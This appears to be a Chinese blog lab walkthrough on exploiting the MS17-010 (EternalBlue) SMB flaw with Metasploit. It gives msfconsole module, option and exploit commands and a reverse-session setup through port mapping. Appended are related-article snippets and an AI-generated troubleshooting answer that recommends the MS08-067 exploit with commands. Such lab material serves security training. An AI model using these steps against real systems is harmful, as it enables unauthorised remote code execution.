MS17-010 实验

最新推荐文章于 2023-08-15 21:27:12 发布
最新推荐文章于 2023-08-15 21:27:12 发布
阅读量244 收藏
点赞数
分类专栏: 测试下 文章标签: 网络 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/meiyingtang/article/details/128930433
版权
本文介绍了如何使用msfconsole工具针对ms17-010漏洞进行非反弹和反弹会话攻击。在非反弹方式中,通过auxiliary模块执行命令,而在反弹会话方式下,由于KaliLinux的NAT配置,需要设置端口映射以实现服务器到个人电脑的连接。涉及的步骤包括模块选择、参数配置以及端口映射操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

网络拓扑

image.png

启动msf
msfconsole

image.png

搜索ms17-010 漏洞模块
search ms17-010

image.png

不反弹会话方式 (不容易打崩)

使用 auxiliary/admin/smb/ms17_010_command 模块
可以直接使用命令:
use auxiliary/admin/smb/ms17_010_command

也可以使用如下方式:
查询出来该模块编号为2 ,可以直接使用命令:
use 2
image.png

查看该模块所需参数
show options
image.png

其中yes参数是必须项

图中 RHOST 项未配置参数

配置为 目标IP set RHOSTS 10.0.3.174

image.png

设置 想要执行的命名

set COMMAND whoami

image.png

执行命令 并返回 结果
exploit
image.png

反弹会话方式

观察实验拓扑图,服务器反弹会话过程,相当于 服务器访问kali的一个端口;但是kali虚拟机以NAT方式联网,服务器无法访问192地址,只能访问到个人电脑10.250.0.XX地址。

这里便需要做个端口映射
将kali的44444 端口映射 个人电脑的44444端口

image.png

端口映射过程

vm中 编辑中 虚拟网络编辑器
image.png

image.png
image.png

image.png

加载模块exploit/windows/smb/ms17_010_psexec
配置参数如下

image.png

ms17-010是什么漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-28 2122
MS17-010是一个安全类型的补丁。Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、ms17-010漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Extended Attributes)转换时,在大非分页池(Large Non-Paged Kernel Pool
通过Metasploit实现MS17-010(永恒之蓝漏洞)的复现学习
Time_worm的博客
07-14 1339
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
msf下MS17-010模块使用总结
热门推荐
whojoe的博客
06-20 1万+
msf下MS17-010模块使用总结前言环境搭建漏洞无杀软情况有杀软情况参考文章 前言 在去年的时候做过一次ms17010的总结,但是现在用起来发现不够详细,所以从新来总结一下。文章分为两个大部分,每个部分分为两种情况。 环境搭建 这里使用的是win2008r2,没有打补丁,之后链接克隆两台虚拟机 kali 192.168.164.155 靶机1 192.168.164.156 靶机2 192.168.164.161(丢一个360的安装包进去,等会要用) 靶机2还要开启命名管道的匿名访问 打开cmd 执行g
MSF里MS17_010利用模块笔记
zhoumouren88的博客
08-31 596
1. auxiliary/scanner/smb/smb_ms17_010 //扫描检测漏洞辅助模块 扫描结果这里可以看到 2,3,4这几台主机存在此漏洞! 2. auxiliary/admin/smb/ms17_010_command //扫描445在线主机 MS17_010漏洞利用需要开放445 smb服务 3. exploit/windows/smb/ms17_010_eternalblue //漏洞利用模块 漏洞利用成功后如图所示,...
ms17_010的几种打法
Innocence_0的博客
08-15 1056
ms17_010是内网的必争之地,很多时候需要借助此漏洞来进行横向,由于多次遇到该漏洞时msf无法利用成功,就通过查阅资料来复现ms17_010的几种打法并在实战中成功。
Try hack me——永恒之蓝——ms17-010
m_de_g的博客
01-08 5751
Try hack me——永恒之蓝 1.开启靶场 2.开启完成后,可以在右边进行测试,由于平台是外国人开发的,可以借助翻译软件进行翻译(如:有道词典) 一、Recon模块 1.根据提示回答问题,使用nmap扫描 2.我们直接使用nmap对靶机进行扫描 nmap -A -v 10.10.240.121 3.通过扫描,可以知道目标靶机,开放了135,139,445,3389,49152,49153,49154,49158,49160等多个端口 4.可以回答第二个问题 How many ports
详解利用ms17-010配合mimikatz获取目标主机账户密码
子曰小玖的博客
05-07 2542
第一步:使用Nmap扫描目标主机开放端口 要知道ms17010是对445端口进行攻击的,所以我们要先对目标机进行端口扫描 nmap 192.168.48.110 第二步:获取权限 在这里我们利用ms17010(永恒之蓝)漏洞来获取靶机的权限。 运行msf,使用ms17010漏洞。 msf5 > use exploit/windows/smb/ms17_010_eternalb...
MS17-010永恒之蓝漏洞原理及复现(学习中,未完善)
chenbx163的博客
08-02 317
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。设置被攻击IP地址后,并执行,然后找到蓝屏命令use0(其他电脑不一定,根据英文选择)并使用。一、什么是永恒之蓝?
永恒之蓝(MS17-010)漏洞攻击实验
qq_37340973的博客
11-12 2395
前言    “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,利用445端口入侵,获取shell进行提权。   工具:kali、windows7 一、开始攻击  ip:kali 192.168.1.100            windows7:192.168.1.101 首先我们ping一下目标靶机(windows7)   进入kali系统的msfconsole攻击框架 搜索MS17-010漏洞,先使用auxiliary/scanner/smb/smb_ms17_010
网络安全-实验ms17-010漏洞利用.docx
11-10
网络安全-实验MS17-010漏洞利用实验背景: MS17-010漏洞,也称为“永恒之蓝”(EternalBlue),是针对Microsoft Windows操作系统的一个严重漏洞,主要影响Windows XP、Windows 7以及Server 2003和2008等未打...
Metasploit-ms17-010永恒之蓝(X86使用)
子曰小玖的博客
04-20 5840
Metasploit正题 搜索相关的漏洞插件 msf > search 17-010 搜索到了4个相关的插件: auxiliary/admin/smb/ms17_010_command auxiliary/scanner/smb/smb_ms17_010 exploit/windows/smb/ms17_010_eternalblue exploit/win...
ms17-010漏洞利用MSF
weixin_42373409的博客
09-10 741
ms17-010漏洞利用 ## **实验环境** 1.kali linux(ip:192.168.131.131) 2.windows 7家庭版(ip:192.168.131.133、445端口开放) ## **利用过程** 1.利用nmap扫描目标主机的端口开放情况;
ms17_010漏洞利用
xgchenghai的博客
05-03 2168
最近工作中又碰到了勒索病毒事件,尽管“WannaCry”已经过去好几年了,但仍有很多单位、人员不以为然,一些人往往只有发生了惨痛后果才会记得牢。重温一下利用过程,看来以后还用得着…… 一、测试环境 使用虚拟机环境进行模拟测试。 类型 系统环境 IP地址 攻击机 kali2020 192.168.10.104 靶机 Windows Server 2008 192.168.10...
MS17-010(Eternal blue永恒之蓝)各模块利用
star1941761196的博客
06-20 1598
kali利用ms17-010漏洞
ms17-010(永恒之蓝) 漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
永恒之蓝ms17_010漏洞复现
m0_73005107的博客
11-28 1519
永恒之蓝漏洞复现
Windows网络服务渗透测试实战MS17-010漏洞复现
c_lanxiaofang的博客
05-16 3758
一、实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二、实验目的及要求 熟悉Metasploit终端的使用方法; 掌握对MS17-010漏洞攻击的方法。 三、复现步骤(附加文字说明加截图) 1、NAT模式 Kali-Linux :192.168.232.141 Windows 7: 192.168.232.142 2、查看ip kali:ip a win7:ipconfig 3、重启网卡 service networking restart 4、测试是否连通 k
利用永恒之蓝渗透WIN7
Cwillchris的博客
10-18 4119
实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:172.16.12.4 用户名:administrator 密码:vgrant 实验步骤: 配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled 查看MS17-010相关模块,并使用序号3扫描模块扫描目标及 msf6 > search ms17-010 msf6
msf6 exploit(windows/smb/ms17_010_eternalblue) > nmap -O 192.168.200.129 [*] exec: nmap -O 192.168.200.129 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 21:32 EDT Nmap scan report for 192.168.200.129 Host is up (0.00026s latency). Not shown: 992 closed tcp ports (reset) PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1433/tcp open ms-sql-s MAC Address: 00:0C:29:1B:D6:5A (VMware) Device type: general purpose Running: Microsoft Windows XP|2003 OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003 Network Distance: 1 hop OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445 rport => 445 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.200.208:4444 [*] 192.168.200.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.200.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit) [*] 192.168.200.129:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.200.129:445 - The target is vulnerable. [-] 192.168.200.129:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets [*] Exploit completed, but no session was created.
最新发布
03-22
<think>好的,我现在需要帮助用户分析他们提供的渗透测试过程,并解释为什么攻击失败。首先,用户在使用Metasploit的永恒之蓝漏洞(ms17_010_eternalblue)进行攻击时遇到了问题,最终没有成功创建会话。让我逐步拆解整个过程,找出可能的原因。 首先,用户一开始在msf6的漏洞模块下执行了nmap -O 192.168.200.129。从nmap的结果来看,目标主机开放了多个端口,包括445(microsoft-ds),这通常是SMB服务使用的端口,而永恒之蓝漏洞正是利用SMB协议的。所以用户正确地将目标指向了这个端口。nmap的操作系统检测结果显示目标可能运行的是Windows XP SP2或Windows Server 2003,这些系统都是32位的。这一点很重要,因为后续的漏洞利用是否支持32位系统会直接影响结果。 接下来,用户设置了rport为445,这是正确的,因为SMB服务通常在此端口监听。然后执行run开始攻击。根据输出,Metasploit首先使用辅助模块scanner/smb/smb_ms17_010进行漏洞检查,确认目标存在漏洞。这里显示目标系统是Windows 5.1 x86,即32位的Windows XP或Server 2003。然而,问题出现在最后一步:模块报告“Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets”,说明该漏洞利用模块仅支持64位系统,而目标系统是32位的,因此攻击被中止。 现在需要确认几个关键点: 1. Metasploit的ms17_010_eternalblue模块是否确实不支持32位目标?查阅文档或模块信息,确认其目标架构。根据错误信息,模块仅支持x64,所以可能该模块设计时只针对64位系统,比如Windows 7或更高版本,而用户的目标是较旧的32位系统。 2. 是否存在针对32位系统的永恒之蓝漏洞利用模块?可能用户需要切换另一个模块,或者调整参数。例如,有些情况下可能需要手动设置目标类型,但该模块可能没有包含32位的目标配置。 3. 是否有其他模块可用?比如,检查是否有其他相关漏洞利用模块适用于32位系统。例如,可能使用另一个利用程序,或者同一个模块的不同设置。 此外,用户可能忽略了在设置漏洞利用时的目标选项。在Metasploit中,某些模块允许使用“show targets”命令查看支持的目标系统,然后使用“set target <编号>”来指定。但根据错误信息,模块本身可能不支持32位,因此即使尝试设置目标也可能无效。 解决方案可能包括: - 检查是否有更新版本的模块支持32位系统,或者寻找替代的利用模块。 - 如果目标确实是32位且无法更改,可能需要使用其他漏洞或方法进行攻击,例如使用不同的漏洞利用,或者结合其他攻击手法。 - 用户可能需要确认目标系统的确切版本,是否有可能误判。比如,虽然nmap检测为32位,是否有可能实际是64位?但根据输出中的OS CPE,显示的是Windows XP SP2或2003,这两个系统通常都是32位的。 总结问题根源:用户使用的Metasploit模块仅支持64位系统,而目标为32位,导致攻击失败。需要调整利用模块或选择其他适合32位系统的攻击途径。</think>以下是逐步分析与解决方案: 1. **漏洞检测阶段** - 使用`nmap -O`确认目标IP开放端口及操作系统: $$ \text{目标系统为Windows XP SP2或Server 2003(32位)} $$ - 关键端口`445/tcp`开放,符合永恒之蓝漏洞利用条件。 2. **漏洞验证阶段** - Metasploit的`smb_ms17_010`检测确认目标存在漏洞: $$ \text{主机状态:VULNERABLE} $$ - 但系统架构检测为`x86 (32-bit)`,与模块要求冲突。 3. **攻击失败原因** - 错误信息明确提示: $$ \text{This module only supports x64 (64-bit) targets} $$ - 当前模块`ms17_010_eternalblue`仅支持64位系统,无法攻击32位目标。 4. **解决方案** - **方案1:更换利用模块** - 查找支持32位系统的永恒之蓝利用模块。例如,某些旧版模块可能兼容,但需验证有效性。 - 在Metasploit中尝试以下命令: ```bash search eternalblue # 检查其他模块是否支持32位(例如 auxiliary/admin/smb/ms17_010_command) ``` - **方案2:手动指定目标参数(若模块支持)** - 使用`show targets`查看模块支持的目标列表: ```bash msf6 exploit(windows/smb/ms17_010_eternalblue) > show targets ``` - 若列表不含32位选项,则此路不通。 - **方案3:使用其他漏洞利用** - 针对Windows XP/2003的其他漏洞(如MS08-067): ```bash use exploit/windows/smb/ms08_067_netapi set RHOST 192.168.200.129 run ``` 5. **补充建议** - **验证目标架构准确性**: 使用`nmap -sV --script smb-os-discovery 192.168.200.129`进一步确认系统信息。 - **更新Metasploit框架**: 确保模块为最新版本,可能存在新增的32位支持。 **总结**:当前失败原因是模块与目标架构不匹配。需更换利用模块或调整目标系统选择。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值